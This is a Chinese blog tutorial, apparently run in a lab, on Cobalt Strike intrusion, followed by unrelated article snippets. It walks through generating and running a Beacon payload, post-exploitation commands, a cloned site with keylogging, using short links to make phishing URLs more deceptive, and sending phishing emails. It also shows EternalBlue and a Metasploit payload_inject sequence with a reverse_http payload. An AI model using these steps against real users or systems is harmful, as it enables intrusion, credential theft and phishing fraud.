CobaltStrike的內網安全

1.上線機器的Beacon的常用命令

2.信息收集和網站克隆

3.釣魚郵件

4.CS傳遞會話到MSF

5.MSF會話傳遞到CS

1上線機器的Beacon的常用命令

介紹:CobaltStrike分為服務端和客戶端,一般我們將服務端放在kali,客戶端可以在物理機上面,或者虛擬機都可以

啟動服務端,首先創建一個監聽(注意,這里要關閉kali的Apache服務,要不然端口占用創建監聽不成功)

payload選擇Beacon HTTP ,HTTP Hosts選擇服務器的IP

點擊save

接著我們用CS生成一個payload(Windows exe),使得我靶機上線:

Lisrener選擇我們創建的監聽服務,點擊Launch

接著會生成一段payload,只要我們將這段payload在其他機器的win+R上粘貼運行,機器就會上線

利用:

打開CS上方的小云朵,會出現我們剛剛生成的web服務

選中服務,點擊下方的Copy URL

啟動我們的Windows10靶機,使用win+R,然后將我們復制的粘貼上去,點擊確定

靶機上線

接著右擊,打開命令窗口,輸入命令就可以查看目標機器信息

常用命令:

1.調節時間可以更快的看到執行命令:sleep 3 (務必執行要不然回顯太慢)

2.如果有的命令沒有找到提示Unknow command:命令前加shell,比如:shell whoami

3.查看局域網情況:net view

4.我們可以可以對機器進行瀏覽器代理、VNC桌面交互、文件瀏覽、網絡探測、端口掃描、進程列表和屏幕截圖等等,這里不再一一展示



2.信息收集和網站克隆

信息收集:

生成的一個網頁我們直接Launch即可

這時候會生成一個網址:

只要別人在內網中訪問這個網址,我們就可以得到機器信息

使用Windows10,訪問:

我們就可以在CS中的web log中獲取機器的信息:

網站克隆:

我們輸入我們需要克隆的網址,這里我選擇的是百度,然后選擇路徑,Attack是攻擊的站點,可以選也可以不選,這里我選的是信息收集的站點,開啟鍵盤記錄

生成成功:

如果我們要發給別人,讓其訪問,但是這樣別人一看就不是正常的網址,我們可以用短鏈接修飾一下,使他看起來更有迷惑性:

這里可以隨便選,我選的第一個,瀏覽器訪問:

之前開了鍵盤記錄,隨便輸一個:pengyuyan

查看CS的web log:

記錄成功

3.釣魚郵件?

第一個Targets:目標,我們新建一個文本文件,將想要發送郵件的目標地址寫上去

第二個Template:就是模版,我們可以登錄自己的郵箱,自己給自己發送一封郵件,然后點擊導出eml文件(注意這里的郵件內容自己編寫,可以把自己克隆的網站寫上去)

第三個Attachment就是附件:可以不填也可以填一個可執行程序

第四個Embed URL:嵌入URL地址,同樣可以寫我們監聽的地址

第五個郵件服務器:

第一個和第二個固定,第三個是自己郵箱,第四個是授權碼,需要我們自己生成:

SSL連接

注意:這里要開啟服務才行

第六個填寫自己的郵箱地址

最后點擊發送,這里是用我自己郵箱測試,查看自己的郵箱,果然發送成功:

4.CS傳遞會話到MS

打開MSF,建立監聽:

注意這里需要使用的HTTP服務,寫上本機IP,運行

打開CS,我們新建一個監聽器:

點擊save

然后選擇靶機右鍵:

選擇我們新建的監聽器:

等待MSF連接:

連接成功

5.MSF會話傳遞到CS

?我們打開Windows7,使用永恒之藍漏洞先讓MSF上線:

接著進行設置:

返回后臺bg

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set lhost 192.168.11.128 # CS服務端IP

set lport 4444?# CS服務端監聽的端口號

set DisablePayloadHandler True

set PrependMigrate True

set session 1 # 會話id

run

打開CS創建一個新的監聽器:

save,等待上線

成功上線

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/41572.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/41572.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/41572.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

tongweb 部署軟航流版簽一體化應用示例 提示跨域錯誤CORS ERROR

目錄 問題現象與描述 解決辦法 原理解析 什么是CORS 瀏覽器跨域請求限制 跨域問題解決方法 跨域請求流程 瀏覽器請求分類解析 http請求方法簡介 問題現象與描述 重慶軟航科技有限公司提供了一套針對針對word、excel等流式文件轉換成PDF版式文件并進行版式文件在線簽章…

ai積累-具體應用的大概設想

這些場景展示了以 ChatGPT 為代表的生成式 AI 可能的具體應用: 教育輔助: AI 可以充當學生的個性化輔導老師,提供定制化的學習材料和練習。例如,它可以生成針對學生能力水平和興趣的數學問題或歷史教學文章。 客戶支持&#xff1…

LESS 的嵌套寫法有什么優勢?

LESS的嵌套寫法可以提高代碼的可讀性和維護性。通過將相關的樣式規則嵌套在父選擇器中&#xff0c;可以更清晰地表達樣式之間的層級關系&#xff0c;避免重復的代碼&#xff0c;并且使樣式結構更加整潔。 例如&#xff0c;假設有以下HTML結構&#xff1a; <div class"…

Qt 加載圖片的幾種方式 以及加載 loading

項目中經常使用加載圖片&#xff1a; 常用有兩種方式&#xff1a; 1.使用 QWidget 加載圖片&#xff1a; 效果&#xff1a; 樣例源碼&#xff1a; int pict_H ui->widgetImage->height();int pict_W ui->widgetImage->width();ui->widgetImage->setFixe…

白騎士的C語言教學高級篇 3.4 C語言中的算法

算法是解決問題的核心。無論是排序、搜索&#xff0c;還是遞歸與動態規劃&#xff0c;算法的選擇和實現對程序的效率和性能有著重要影響。本節將介紹幾種常見的算法&#xff0c;包括排序算法、搜索算法&#xff0c;以及遞歸和動態規劃的應用。 排序算法 排序算法是將一組數據按…

昇思25天學習打卡營第17天|SSD目標檢測

學AI還能贏獎品&#xff1f;每天30分鐘&#xff0c;25天打通AI任督二脈 (qq.com) SSD目標檢測 模型簡介 SSD&#xff0c;全稱Single Shot MultiBox Detector&#xff0c;是Wei Liu在ECCV 2016上提出的一種目標檢測算法。使用Nvidia Titan X在VOC 2007測試集上&#xff0c;SSD…

使用 CloudWatch + SNS + Lambda 實現多渠道告警系統

1. 簡介 在現代云計算環境中,及時和有效的監控告警對于維護系統的穩定性至關重要。本文將介紹如何使用 AWS CloudWatch、Simple Notification Service (SNS) 和 Lambda 函數構建一個多渠道告警系統,包括郵件告警、釘釘機器人告警和電話語音告警。 2. 系統架構 整個系統的工…

利用border繪制三角技巧

繪制三角形的效果如圖 <html lang"zh-cn"> <head><meta charset"UTF-8"><title>demo</title><style>* {margin: 0;padding: 0;}.box {/* 盒子寬高改成零就變成三角形 &#xff0c;需要哪個方向的三角形就設置哪個方向…

Python一些可能用的到的函數系列130 UCS-Time Brick

說明 UCS對象是基于GFGoLite進行封裝&#xff0c;且側重于實現UCS規范。 內容 1 函數 我發現pydantic真是一個特別好用的東西&#xff0c;可以確保在數據傳遞時的可靠&#xff0c;以及對某個數據模型的描述。 以下&#xff0c;UCS給出了id、time相關的brick映射&#xff0…

【分布式系統五】監控平臺Zabbix實際監控運用(命令+截圖詳細版)

目錄 一.Zabbix 監控 Windows 1.安裝zabbix 2.Web 頁面添加主機&#xff0c;關聯模板 二.Zabbix 監控 Java 應用 1.安裝tomcat 2.服務端安裝 zabbix-java-gateway 3.Web 頁面添加主機&#xff0c;關聯模板 三.Zabbix 監控 SNMP 1.服務端安裝 snmp 監控程序 2.修改 sn…

RT-Thread和freeRTOS啟動流程

一. freeRTOS啟動流程 二. RT-Thread啟動流程 因為RT-Thread中我們定義了補丁函數也叫做鉤子函數--$Sub$$main()--作為一個新功能函數&#xff0c;可以將原有函數劫持下來&#xff0c;并在之后的程序運行中加上$Super $ $前綴來重新調用原始函數。 所以啟動流程是$Sub$$main(…

Chiasmodon:一款針對域名安全的公開資源情報OSINT工具

關于Chiasmodon Chiasmodon是一款針對域名安全的公開資源情報OSINT工具&#xff0c;該工具可以幫助廣大研究人員從各種來源收集目標域名的相關信息&#xff0c;并根據域名、Google Play應用程序、電子郵件地址、IP地址、組織和URL等信息進行有針對性的數據收集。 該工具可以提…

利用node連接mongodb實現一個小型后端服務系統demo

http 請求 實現get請求數據庫數據&#xff1b;實現添加數據實現編輯數據實現刪除數據實現導出txt文件、Excel文件實現查詢數據庫數據并利用導出為excel文件 node 版本 16.16.0 node 版本 18.16.0 會連接 MongoDB 數據庫錯誤。 Connected to MongoDB failed MongoServerSele…

Nginx-簡介

介紹 nginx是一款HTTP和反向代理服務器、郵件代理服務器和通用TCP/IP代理服務器&#xff0c;在俄羅斯廣泛使用&#xff0c;用于代理高負載站點。 版本 nginx開源版nginx plus企業版openresty將nginx和lua腳本結合 tengine更穩定、高性能 正向代理 客戶端和代理服務是一伙的…

【vue動態組件】VUE使用component :is 實現在多個組件間來回切換

VUE使用component :is 實現在多個組件間來回切換 component :is 動態父子組件傳值 相關代碼實現&#xff1a; <component:is"vuecomponent"></component>import componentA from xxx; import componentB from xxx; import componentC from xxx;switch(…

生產力工具|viso常用常見科學素材包

一、科學插圖素材網站 一圖勝千言&#xff0c;想要使自己的論文或重要匯報更加引人入勝&#xff1f;不妨考慮利用各類示意圖和科學插圖來輔助研究工作。特別是對于新手或者繁忙的科研人員而言&#xff0c;利用免費的在線科學插圖素材庫&#xff0c;能夠極大地節省時間和精力。 …

Python字符編碼檢測利器: chardet庫詳解

Python字符編碼檢測利器: chardet庫詳解 1. chardet簡介2. 安裝3. 基本使用3.1 檢測字符串編碼3.2 檢測文件編碼 4. 高級功能4.1 使用UniversalDetector4.2 自定義編碼檢測 5. 實際應用示例5.1 批量處理文件編碼5.2 自動轉換文件編碼 6. 性能優化7. 注意事項和局限性8. 總結 在…

【代碼隨想錄】【算法訓練營】【第58天】 [卡碼110]字符串接龍 [卡碼105]有向圖的完全可達性 [卡碼106]島嶼的周長

前言 思路及算法思維&#xff0c;指路 代碼隨想錄。 題目來自 卡碼網。 day 59&#xff0c;周五&#xff0c;繼續ding~ 題目詳情 [卡碼110] 字符串接龍 題目描述 卡碼110 字符串接龍 解題思路 前提&#xff1a; 思路&#xff1a; 重點&#xff1a; 代碼實現 C語言 […

Jackson庫使用教程

1. Jackson概述 定義: Jackson是一個基于Java的開源JSON解析工具&#xff0c;用于Java對象與JSON數據的互相轉換。示例JSON:{"author": "一路向北_Coding","age": 20,"hobbies": ["coding", "leetcode", "r…

昇思25天學習打卡營第13天|linchenfengxue

Diffusion擴散模型 關于擴散模型&#xff08;Diffusion Models&#xff09;有很多種理解&#xff0c;本文的介紹是基于denoising diffusion probabilistic model &#xff08;DDPM&#xff09;&#xff0c;DDPM已經在&#xff08;無&#xff09;條件圖像/音頻/視頻生成領域取得…